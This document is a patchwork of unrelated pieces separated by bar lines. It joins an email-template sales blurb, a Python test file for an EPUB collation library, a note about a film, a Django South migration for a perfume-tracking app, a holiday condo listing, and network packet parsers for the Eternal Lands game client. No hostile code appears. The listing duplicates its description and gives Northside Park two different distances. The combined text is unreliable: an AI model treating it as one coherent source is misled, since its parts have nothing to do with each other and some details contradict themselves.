If you’ve added interactive elements in your emails, you need to test HTML email on as many devices and in as many email clients as possible. Send test emails to your colleagues, friends, to everyone who won’t mind it, to see if interactivity works in the world’s top email clients.
Soon, we will integrate with Email on Acid. This tool shows how your email renders on like 80 devices and in like 20 email clients. Moreover, it will enable our users to check their emails for accessibility, for the links and even for the spam rate.
Like your final result? Then export your email to ESP you use.
Use our 300 prepared HTML email templates to reduce email production time by 60%.
|
# -*- coding: utf-8 -*-
# ###
# Copyright (c) 2016, Rice University
# This software is subject to the provisions of the GNU Affero General
# Public License version 3 (AGPLv3).
# See LICENCE.txt for details.
# ###
import os
import io
import unittest
try:
from unittest import mock
except ImportError:
import mock
from lxml import etree
from .test_models import BaseModelTestCase
here = os.path.abspath(os.path.dirname(__file__))
TEST_DATA_DIR = os.path.join(here, 'data')
class ReconstituteTestCase(unittest.TestCase):
maxDiff = None
def test_xhtml(self):
page_path = os.path.join(TEST_DATA_DIR, 'desserts-single-page.xhtml')
with open(page_path) as html:
from cnxepub.collation import reconstitute
desserts = reconstitute(html)
self.check_desserts(desserts)
def test_html(self):
page_path = os.path.join(TEST_DATA_DIR, 'desserts-single-page.html')
with open(page_path) as html:
from cnxepub.collation import reconstitute
desserts = reconstitute(html)
self.check_desserts(desserts)
def check_desserts(self, desserts):
"""Assertions for the desserts model"""
from ..models import model_to_tree
self.assertEqual('Desserts', desserts.metadata['title'])
self.assertEqual({
'shortId': None,
'id': '00000000-0000-0000-0000-000000000000@1.3',
'contents': [{
'shortId': 'frt',
'id': 'ec84e75d-9973-41f1-ab9d-1a3ebaef87e2@1.3',
'contents': [{
'shortId': None,
'id': 'apple@1.3',
'title': 'Apple'
},
{
'shortId': None,
'id': 'lemon@1.3',
'title': u'<span>1.1</span> <span>|</span> <span>レモン</span>'
},
{
'shortId': 'sfE7YYyV@1.3',
'id': 'b1f13b61-8c95-5fbe-9112-46400b6dc8de@1.3',
'contents': [{
'shortId': None,
'id': 'lemon@1.3',
'title': 'Lemon'
}
],
'title': '<span>Chapter</span> <span>2</span> <span>citrus</span>'
}
],
'title': 'Fruity'
},
{
'shortId': None,
'id': 'chocolate@1.3',
'title': u'チョコレート'
},
{
'shortId': None,
'id': 'extra@1.3',
'title': 'Extra Stuff'
}
],
'title': 'Desserts'}, model_to_tree(desserts))
base_metadata = {
u'publishers': [],
u'created': None, # '2016/03/04 17:05:20 -0500',
u'revised': None, # '2013/03/05 09:35:24 -0500',
u'authors': [
{u'type': u'cnx-id',
u'name': u'Good Food',
u'id': u'yum'}],
u'editors': [],
u'copyright_holders': [],
u'illustrators': [],
u'subjects': [u'Humanities'],
u'translators': [],
u'keywords': [u'Food', u'デザート', u'Pudding'],
u'title': u'チョコレート',
u'license_text': u'CC-By 4.0',
u'license_url': u'http://creativecommons.org/licenses/by/4.0/',
# 'version': 'draft',
u'language': 'en',
u'print_style': None,
u'cnx-archive-uri': None,
u'cnx-archive-shortid': None,
u'derived_from_title': None,
u'derived_from_uri': None,
u'version': None,
u'canonical_book_uuid': None,
u'slug': None,
}
fruity = desserts[0]
self.assertEqual('Binder', fruity.__class__.__name__)
self.assertEqual('Fruity', fruity.metadata['title'])
apple = fruity[0]
self.assertEqual('Document', apple.__class__.__name__)
metadata = base_metadata.copy()
metadata['title'] = 'Apple'
metadata['version'] = '1.3'
metadata['revised'] = '2013/03/05 09:35:24 -0500'
metadata['canonical_book_uuid'] = 'ea4244ce-dd9c-4166-9c97-acae5faf0ba1'
apple_metadata = apple.metadata.copy()
summary = etree.fromstring(apple_metadata.pop('summary'))
self.assertEqual('{http://www.w3.org/1999/xhtml}p', summary.tag)
self.assertEqual('summary', summary.text)
self.assertEqual(metadata, apple_metadata)
lemon = fruity[1]
self.assertEqual('Document', lemon.__class__.__name__)
metadata = base_metadata.copy()
metadata['title'] = 'Lemon'
metadata['version'] = '1.3'
metadata['revised'] = '2013/03/05 09:35:24 -0500'
apple_metadata = apple.metadata.copy()
lemon_metadata = lemon.metadata.copy()
summary = etree.fromstring(lemon_metadata.pop('summary'))
self.assertEqual('{http://www.w3.org/1999/xhtml}p', summary.tag)
self.assertEqual('summary', summary.text)
self.assertEqual(metadata, lemon_metadata)
citrus = fruity[2]
self.assertEqual('Binder', citrus.__class__.__name__)
self.assertEqual(citrus.metadata['title'], 'Citrus')
self.assertEqual(lemon.metadata, citrus[0].metadata)
chocolate = desserts[1]
self.assertEqual('Document', chocolate.__class__.__name__)
chocolate_metadata = chocolate.metadata.copy()
summary = etree.fromstring(chocolate_metadata.pop('summary'))
self.assertEqual('{http://www.w3.org/1999/xhtml}p', summary.tag)
self.assertEqual('summary', summary.text)
metadata = base_metadata.copy()
metadata['title'] = u'チョコレート'
metadata['version'] = '1.3'
metadata['revised'] = '2013/03/05 09:35:24 -0500'
apple_metadata = apple.metadata.copy()
self.assertEqual(metadata, chocolate_metadata)
extra = desserts[2]
self.assertEqual('CompositeDocument', extra.__class__.__name__)
extra_metadata = extra.metadata.copy()
summary = etree.fromstring(extra_metadata.pop('summary'))
self.assertEqual('{http://www.w3.org/1999/xhtml}p', summary.tag)
self.assertEqual('summary', summary.text)
metadata = base_metadata.copy()
metadata['title'] = 'Extra Stuff'
metadata['version'] = '1.3'
metadata['revised'] = '2013/03/05 09:35:24 -0500'
self.assertEqual(metadata, extra_metadata)
class CollateTestCase(BaseModelTestCase):
@property
def target(self):
from cnxepub.collation import collate
return collate
def test(self):
binder = self.make_binder(
'8d75ea29',
metadata={'version': '3', 'title': 'Book One',
'license_url': 'http://my.license',
'cnx-archive-uri': 'bad183c3-8776-4a6d-bb02-3b11e0c26aaf'},
nodes=[
self.make_document(
id="e78d4f90",
content=b"<body><p>document one</p></body>",
metadata={'version': '3',
'title': "Document One",
'license_url': 'http://my.license'}),
self.make_document(
id="3c448dc6",
content=b"<body><p>document two</p></body>",
metadata={'version': '1',
'title': "Document Two",
'license_url': 'http://my.license'})])
# Append a ruleset to the binder.
ruleset = io.BytesIO(b" ")
resource = self.make_resource('ruleset', ruleset, 'text/css',
filename='ruleset.css')
binder.resources.append(resource)
def mock_easybake(ruleset, in_html, out_html):
from lxml import etree
html = etree.parse(in_html)
# Add in a composite-page with title "Composite One" here.
body = html.getroot().xpath(
'//xhtml:body',
namespaces={'xhtml': 'http://www.w3.org/1999/xhtml'})[0]
comp_elm = etree.SubElement(body, 'div')
comp_elm.attrib['data-type'] = 'composite-page'
comp_elm.append(etree.fromstring("""
<div data-type="metadata">
<h1 data-type="document-title" itemprop="name">Composite One</h1>
<div class="authors">
By:
Edited by:
Illustrated by:
Translated by:
</div>
<div class="publishers">
Published By:
</div>
<div class="permissions">
<p class="license">
Licensed:
<a href="" itemprop="dc:license,lrmi:useRightsURL" data-type="license"/>
</p>
</div>
<div class="description" itemprop="description" data-type="description"> </div>
</div>"""))
etree.SubElement(comp_elm, 'p').text = "composite document"
# Add the composite-page to the table-of-contents.
toc = html.getroot().xpath(
"//xhtml:*[@id='toc']/xhtml:ol",
namespaces={'xhtml': 'http://www.w3.org/1999/xhtml'})[0]
etree.SubElement(toc, 'li').append(etree.fromstring('<a>Composite One</a>'))
out_html.write(etree.tostring(html))
with mock.patch('cnxepub.collation.easybake') as easybake:
easybake.side_effect = mock_easybake
fake_ruleset = 'div::after {contents: "test"}'
collated_binder = self.target(binder, fake_ruleset)
# Check for the appended composite document
self.assertEqual(len(collated_binder), 3)
self.assertEqual(collated_binder[2].id, 'a9428a6c-5d31-5425-8335-8a2e780651e0')
self.assertEqual(collated_binder[2].metadata['title'],
'Composite One')
def test_without_ruleset(self):
binder = self.make_binder(
'8d75ea29',
metadata={'version': '3', 'title': "Book One",
'license_url': 'http://my.license'},
nodes=[
self.make_document(
id="e78d4f90",
metadata={'version': '3',
'title': "Document One",
'license_url': 'http://my.license'}),
self.make_document(
id="3c448dc6",
metadata={'version': '1',
'title': "Document Two",
'license_url': 'http://my.license'})])
result = self.target(binder)
self.assertIs(binder, result)
def test_with_ruleset(self):
binder = self.make_binder(
'8d75ea29',
metadata={'version': '3', 'title': "Book One",
'license_url': 'http://my.license'},
nodes=[
self.make_document(
id="e78d4f90",
content=b"<body><span>document one</span></body>",
metadata={'version': '3',
'title': "Document One",
'license_url': 'http://my.license'}),
self.make_document(
id="3c448dc6",
content=b"<body><span>document two</span></body>",
metadata={'version': '1',
'title': "Document Two",
'license_url': 'http://my.license'})])
# Append a ruleset to the binder.
ruleset_bytes = b"""\
div[data-type='page'] > div[data-type='metadata'] {
copy-to: eob-all
}
div[data-type='page'] span {
copy-to: eob-all
}
body::after {
content: pending(eob-all);
class: end-of-book;
data-type: composite-page;
container: div;
}
/* copied from cte books/rulesets/common/toc.less */
body > div[data-type="page"],
body > div[data-type="composite-page"]:pass(20) {
string-set: page-id attr(id);
}
body > div[data-type="page"] > div[data-type="metadata"] > \
h1[data-type='document-title'],
body > div[data-type="composite-page"] > div[data-type="metadata"] > \
h1[data-type='document-title']:pass(20) {
copy-to: page-title;
}
body > div[data-type="page"]::after,
body > div[data-type="composite-page"]:pass(20)::after {
content: pending(page-title);
attr-href: "#" string(page-id);
container: a;
move-to: page-link;
}
body > div[data-type="page"]::after,
body > div[data-type="composite-page"]:pass(20)::after {
content: pending(page-link);
move-to: eob-toc;
container: li;
}
nav#toc:pass(30) {
content: '';
}
nav#toc:pass(30)::after {
content: pending(eob-toc);
container: ol;
}
"""
resource = self.make_resource('ruleset',
io.BytesIO(ruleset_bytes),
'text/css',
filename='ruleset.css')
binder.resources.append(resource)
collated_binder = self.target(binder, ruleset_bytes)
# Check for the appended composite document
self.assertEqual(len(collated_binder), 3)
self.assertEqual(collated_binder[2].metadata['title'],
'Document One')
|
"A Pile of Prints," the film that gave this site its name, has been revised and renamed, "Color?"
a pile of my prints? Click the photo below and then the "play" arrow to see my answer.
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting model 'SplitClient'
db.delete_table(u'notes_splitclient')
# Adding model 'SplitTrans'
db.create_table(u'notes_splittrans', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('split', self.gf('django.db.models.fields.related.ForeignKey')(related_name='client', to=orm['notes.Split'])),
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
))
db.send_create_signal(u'notes', ['SplitTrans'])
# Deleting field 'ParfumSizes.size_oz'
db.delete_column(u'notes_parfumsizes', 'size_oz')
# Adding field 'ParfumSizes.size_ml'
db.add_column(u'notes_parfumsizes', 'size_ml',
self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=4, decimal_places=2),
keep_default=False)
# Deleting field 'Split.min_ml'
db.delete_column(u'notes_split', 'min_ml')
# Deleting field 'Split.pp_ml'
db.delete_column(u'notes_split', 'pp_ml')
# Adding field 'Split.bottle_price'
db.add_column(u'notes_split', 'bottle_price',
self.gf('django.db.models.fields.related.ForeignKey')(default=1, related_name='decanted', to=orm['notes.ParfumSizes']),
keep_default=False)
# Adding field 'Split.splits'
db.add_column(u'notes_split', 'splits',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'Split.split_size'
db.add_column(u'notes_split', 'split_size',
self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=8, decimal_places=2),
keep_default=False)
def backwards(self, orm):
# Adding model 'SplitClient'
db.create_table(u'notes_splitclient', (
('user', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['auth.User'])),
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('split', self.gf('django.db.models.fields.related.ForeignKey')(related_name='client', to=orm['notes.Split'])),
))
db.send_create_signal(u'notes', ['SplitClient'])
# Deleting model 'SplitTrans'
db.delete_table(u'notes_splittrans')
# Adding field 'ParfumSizes.size_oz'
db.add_column(u'notes_parfumsizes', 'size_oz',
self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=4, decimal_places=2),
keep_default=False)
# Deleting field 'ParfumSizes.size_ml'
db.delete_column(u'notes_parfumsizes', 'size_ml')
# Adding field 'Split.min_ml'
db.add_column(u'notes_split', 'min_ml',
self.gf('django.db.models.fields.PositiveIntegerField')(default=0),
keep_default=False)
# Adding field 'Split.pp_ml'
db.add_column(u'notes_split', 'pp_ml',
self.gf('django.db.models.fields.DecimalField')(default=0, max_digits=8, decimal_places=2),
keep_default=False)
# Deleting field 'Split.bottle_price'
db.delete_column(u'notes_split', 'bottle_price_id')
# Deleting field 'Split.splits'
db.delete_column(u'notes_split', 'splits')
# Deleting field 'Split.split_size'
db.delete_column(u'notes_split', 'split_size')
models = {
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
u'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
u'notes.classification': {
'Meta': {'object_name': 'Classification'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'notes.currency': {
'Meta': {'object_name': 'Currency'},
'country': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '10'})
},
u'notes.house': {
'Meta': {'object_name': 'House'},
'abbrev_name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'bio_url': ('django.db.models.fields.URLField', [], {'max_length': '200'}),
'display_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'founded': ('django.db.models.fields.DateField', [], {}),
'founder': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'national_origin': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'website': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'notes.likeditem': {
'Meta': {'object_name': 'LikedItem'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'liked_by': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {})
},
u'notes.note': {
'Meta': {'object_name': 'Note'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'notes': ('django.db.models.fields.TextField', [], {}),
'resource': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'notes.parfum': {
'Meta': {'object_name': 'Parfum'},
'classification': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['notes.Classification']", 'symmetrical': 'False'}),
'house': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'parfums'", 'to': u"orm['notes.House']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'notes_base': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'base_notes'", 'symmetrical': 'False', 'to': u"orm['notes.Note']"}),
'notes_heart': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'heart_notes'", 'symmetrical': 'False', 'to': u"orm['notes.Note']"}),
'notes_top': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'top_notes'", 'symmetrical': 'False', 'to': u"orm['notes.Note']"}),
'perfumer': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'parfums'", 'blank': 'True', 'to': u"orm['notes.Perfumer']"})
},
u'notes.parfumsizes': {
'Meta': {'object_name': 'ParfumSizes'},
'currency': ('django.db.models.fields.CharField', [], {'max_length': '10'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parfum': ('django.db.models.fields.related.ManyToManyField', [], {'related_name': "'parfum_sizes'", 'symmetrical': 'False', 'to': u"orm['notes.Parfum']"}),
'price': ('django.db.models.fields.DecimalField', [], {'max_digits': '8', 'decimal_places': '2'}),
'size_ml': ('django.db.models.fields.DecimalField', [], {'max_digits': '4', 'decimal_places': '2'})
},
u'notes.perfumer': {
'Meta': {'object_name': 'Perfumer'},
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '200'})
},
u'notes.review': {
'Meta': {'object_name': 'Review'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'item': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'reviews'", 'to': u"orm['notes.Parfum']"}),
'review': ('django.db.models.fields.TextField', [], {}),
'reviewed_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'reviews'", 'to': u"orm['auth.User']"})
},
u'notes.split': {
'Meta': {'object_name': 'Split'},
'bottle': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'decanted'", 'to': u"orm['notes.Parfum']"}),
'bottle_price': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'decanted'", 'to': u"orm['notes.ParfumSizes']"}),
'host': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'host'", 'to': u"orm['auth.User']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'split_size': ('django.db.models.fields.DecimalField', [], {'max_digits': '8', 'decimal_places': '2'}),
'splits': ('django.db.models.fields.PositiveIntegerField', [], {})
},
u'notes.splittrans': {
'Meta': {'object_name': 'SplitTrans'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'split': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'client'", 'to': u"orm['notes.Split']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['auth.User']"})
}
}
complete_apps = ['notes']
|
Beachloft 1-B Condominium in Ocean City is a holiday home with 1 room.
Situated in Ocean City, just 3.4 km from Roland E. Powell Convention Center & Visitors Info Center, Beachloft 1-B Condominium offers accommodation with free WiFi. Guests staying at this apartment have access to a balcony. The apartment includes 1 bedroom and a living room with a TV and a DVD player. There is a seating area and a kitchen complete with a dishwasher, an oven and a microwave. Northside Park is 5 km from the apartment, while Northside Park is 6 km away. The nearest airport is Salisbu...ry-Ocean City Wicomico Regional Airport, 48 km from Beachloft 1-B Condominium.
Situated in Ocean City, just 3.4 km from Roland E. Powell Convention Center & Visitors Info Center, Beachloft 1-B Condominium offers accommodation wit...h free WiFi. Guests staying at this apartment have access to a balcony. The apartment includes 1 bedroom and a living room with a TV and a DVD player. There is a seating area and a kitchen complete with a dishwasher, an oven and a microwave. Northside Park is 5 km from the apartment, while Northside Park is 6 km away. The nearest airport is Salisbury-Ocean City Wicomico Regional Airport, 48 km from Beachloft 1-B Condominium.
When would you like to stay at Beachloft 1-B Condominium?
Guests are required to show a photo identification and credit card upon check-in. Please note that all Special Requests are subject to availability and additional charges may apply. Please inform Beachloft 1-B Condominium in advance of your expected arrival time. You can use the Special Requests box when booking, or contact the property directly with the contact details provided in your confirmation. Guests under the age of 25 can only check in with a parent or official guardian who is also staying in the unit. Please note if the reservation is canceled, the total amount plus all fees ,including the service charge and taxes, are non refundable.
|
# Copyright 2008 Alex Collins
#
# This file is part of Pyela.
#
# Pyela is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Pyela is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Pyela. If not, see <http://www.gnu.org/licenses/>.
"""Numerous objects for parsing the messages (raw bytes) from a server
into their relevant format for use with the rest of the API.
The MessageParser base class defines common functionality for using these
objects without prior knowledge of the instance at runtime.
"""
import logging
import struct
import time
from pyela.el.common.actors import ELActor
from pyela.el.util.strings import strip_chars, split_str, is_colour, el_colour_to_rgb, bytes_find, bytes_rfind
from pyela.el.net.packets import ELPacket
from pyela.el.net.elconstants import ELNetFromServer, ELNetToServer, ELConstants
from pyela.el.net.channel import Channel
from pyela.el.logic.eventmanagers import ELSimpleEventManager
from pyela.el.logic.events import ELEventType, ELEvent
log = logging.getLogger('pyela.el.net.parsers')
em = ELSimpleEventManager()
class MessageParser(object):
"""A message received from the Eternal Lands server"""
def __init__(self, connection):
"""The connection should be an instance of ELConnection"""
self.connection = connection
def parse(self, packet):
"""Parse the given packet and return a list of Event
instances (or derivatives) (if any)
"""
pass
class ELRawTextMessageParser(MessageParser):
"""Parses RAW_TEXT messages"""
def parse(self, packet):
event = ELEvent(ELEventType(ELNetFromServer.RAW_TEXT))
event.data = {}
event.data['connection'] = self.connection #The connection the message origins from
event.data['channel'] = packet.data[0] # The channel of the message
event.data['text'] = strip_chars(packet.data[1:]) # The stripped text of the message, no colour codes, special characters translated to utf8
event.data['raw'] = packet.data[1:] # The raw text including colour codes and untranslated special characters
return [event]
class ELAddActorMessageParser(MessageParser):
def parse(self, packet):
"""Parse an ADD_NEW_(ENHANCED)_ACTOR message"""
if log.isEnabledFor(logging.DEBUG): log.debug("New actor: %s" % packet)
actor = ELActor()
actor.id, actor.x_pos, actor.y_pos, actor.z_pos, \
actor.z_rot, actor.type, frame, actor.max_health, \
actor.cur_health, actor.kind_of_actor \
= struct.unpack('<HHHHHBBHHB', packet.data[:17])
events = []
#Remove the buffs from the x/y coordinates
actor.x_pos = actor.x_pos & 0x7FF
actor.y_pos = actor.y_pos & 0x7FF
if packet.type == ELNetFromServer.ADD_NEW_ENHANCED_ACTOR:
actor.name = packet.data[28:]
frame = packet.data[22] #For some reason, data[11] is unused in the ENHANCED message
actor.kind_of_actor = packet.data[27]
else:
actor.name = packet.data[17:]
#The end of name is a \0, and there _might_ be two OR three more bytes
# containing actor-scale info.
name_end = bytes_find(actor.name, 0)
if name_end < len(actor.name)-2:
#There are two OR three more bytes after the name,
# the actor scaling bytes and possibly the attachment type
unpacked = struct.unpack('<H', actor.name[name_end+1:name_end+3])
actor.scale = unpacked[0]
#actor.scale = float(scale)/ELConstants.ACTOR_SCALE_BASE
if len(actor.name) > name_end+3:
pass
#TODO: The actor class has no attachment_type member (yet)
# The below code is tested and extracts the correct information
#actor.attachment_type = struct.unpack('B', actor.name[name_end+3])[0]
#if actor.attachment_type > 0 and actor.attachment_type < 255:
# ##ON A HORSE!!
#else:
# actor.attachment_type = 0 # The server sends either 255 or 0 if we're not on a horse
actor.name = actor.name[:name_end]
else:
actor.scale = 1
actor.name = actor.name[:-1]
#Find the actor's name's colour char
i = 0
while i < len(actor.name) and is_colour(actor.name[i]):
actor.name_colour = el_colour_to_rgb(actor.name[i])
i += 1
if actor.name_colour[0] == -1:
#We didn't find any colour codes, use kind_of_actor
if actor.kind_of_actor == ELConstants.NPC:
#NPC, bluish
#The official client colour is (0.3, 0.8, 1.0), but it's too green to see on the minimap
actor.name_colour = (0.0, 0.0, 1.0)
elif actor.kind_of_actor in (ELConstants.HUMAN, ELConstants.COMPUTER_CONTROLLED_HUMAN):
#Regular player, white
actor.name_colour = (1.0, 1.0, 1.0)
elif packet.type == ELNetFromServer.ADD_NEW_ENHANCED_ACTOR and actor.kind_of_actor in (ELConstants.PKABLE_HUMAN, ELConstants.PKABLE_COMPUTER_CONTROLLED):
#PKable player, red
actor.name_colour = (1.0, 0.0, 0.0)
else:
#Animal, yellow
actor.name_colour = (1.0, 1.0, 0.0)
space = bytes_rfind(actor.name, ord(' '))
if space != -1 and space > 0 and space+1 < len(actor.name) and is_colour(actor.name[space+1]):
actor.name = strip_chars(actor.name)
if log.isEnabledFor(logging.DEBUG): log.debug("Actor has a guild. Parsing from '%s'" % actor.name)
# split the name into playername and guild
tokens = actor.name.rsplit(' ', 1)
actor.name = tokens[0]
actor.guild = tokens[1]
else:
actor.name = strip_chars(actor.name)
#Deal with the current frame of the actor
if frame in (ELConstants.FRAME_DIE1, ELConstants.FRAME_DIE2):
actor.dead = True
elif frame in (ELConstants.FRAME_COMBAT_IDLE, ELConstants.FRAME_IN_COMBAT):
actor.fighting = True
elif frame >= ELConstants.FRAME_ATTACK_UP_1 and frame <= ELConstants.FRAME_ATTACK_UP_10:
actor.fighting = True
elif frame in (ELConstants.PAIN1, ELConstants.PAIN2):
actor.fighting = True
self.connection.session.actors[actor.id] = actor
event = ELEvent(ELEventType(ELNetFromServer.ADD_NEW_ACTOR))
event.data = actor #TODO: add connection to event data
events.append(event)
if actor.id == self.connection.session.own_actor_id:
self.connection.session.own_actor = actor
event = ELEvent(ELEventType(ELNetFromServer.YOU_ARE))
event.data = actor #TODO: add connection to event data
events.append(event)
if log.isEnabledFor(logging.DEBUG): log.debug("Actor parsed: %s, %s, %s, %s, %s, %s, %s, %s, %s, %s" % (actor.id, actor.x_pos, actor.y_pos, actor.z_pos, \
actor.z_rot, actor.type, actor.max_health, \
actor.cur_health, actor.kind_of_actor, actor.name))
return events
class ELRemoveActorMessageParser(MessageParser):
def _get_ids(data):
offset = 0
while offset < len(data):
yield struct.unpack_from('<H', data, offset)[0]
offset += 2
_get_ids = staticmethod(_get_ids)
def parse(self, packet):
"""Remove actor packet. Remove from self.connection.session.actors dict"""
if log.isEnabledFor(logging.DEBUG): log.debug("Remove actor packet: '%s'" % packet.data)
if log.isEnabledFor(logging.DEBUG): log.debug("Actors: %s" % self.connection.session.actors)
for actor_id in self._get_ids(packet.data):
event = ELEvent(ELEventType(ELNetFromServer.REMOVE_ACTOR))
event.data = {}
event.data['connection'] = self.connection
event.data['id'] = actor_id
event.data['actor'] = self.connection.session.actors[actor_id]
if actor_id in self.connection.session.actors:
del self.connection.session.actors[actor_id]
if actor_id == self.connection.session.own_actor_id:
self.connection.session.own_actor_id = -1
self.connection.session.own_actor = None
return [event]
class ELRemoveAllActorsParser(MessageParser):
def parse(self, packet):
event = ELEvent(ELEventType(ELNetFromServer.KILL_ALL_ACTORS))
event.data = {'connection': self.connection} # The full actors list can be added to the event data if it's required
self.connection.session.actors = {}
if log.isEnabledFor(logging.DEBUG): log.debug("Remove all actors packet")
return [event]
class ELAddActorCommandParser(MessageParser):
def _get_commands(data):
offset = 0
while offset < len(data):
yield struct.unpack_from('<HB', data, offset)
offset += 3
_get_commands = staticmethod(_get_commands)
def parse(self, packet):
events = []
if log.isEnabledFor(logging.DEBUG): log.debug("Actor command packet: '%s'" % packet.data)
for actor_id, command in self._get_commands(packet.data):
if actor_id in self.connection.session.actors:
self.connection.session.actors[actor_id].handle_command(command)
event = ELEvent(ELEventType(ELNetFromServer.ADD_ACTOR_COMMAND))
event.data = {'actor': self.connection.session.actors[actor_id], 'command': command, 'connection': self.connection}
events.append(event)
else:
#The actor could not be found. Something strange has happened.
#Request a new list of nearby actors from the server (resync).
#TODO: Log?
self.connection.send(ELPacket(ELNetToServer.SEND_ME_MY_ACTORS, None))
return events
class ELYouAreParser(MessageParser):
def parse(self, packet):
if log.isEnabledFor(logging.DEBUG): log.debug("YouAre packet: '%s'" % packet.data)
id = struct.unpack('<H', packet.data)[0]
self.connection.session.own_actor_id = id
if id in self.connection.session.actors:
self.connection.session.own_actor = self.connection.session.actors[id]
event = ELEvent(ELEventType(ELNetFromServer.YOU_ARE))
event.data = self.connection.session.own_actor #TODO: Add connection to event.data
return[event]
return []
